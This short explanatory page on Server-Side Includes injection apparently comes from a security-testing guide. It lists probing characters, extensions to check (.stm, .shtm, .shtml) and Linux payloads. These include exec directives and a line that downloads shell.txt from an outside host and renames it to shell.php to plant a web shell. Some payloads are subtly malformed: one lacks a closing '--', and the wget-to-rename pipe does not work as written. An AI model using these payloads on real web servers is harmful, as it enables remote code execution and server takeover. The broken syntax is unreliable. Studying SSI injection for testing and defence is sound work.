Server Side Includes Injection

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:

< ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml.

Linux examples:

List files of directory:

<!--#exec cmd="ls" -->

Access directories:

<!--#exec cmd="cd /root/dir/">

Execution script:

<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->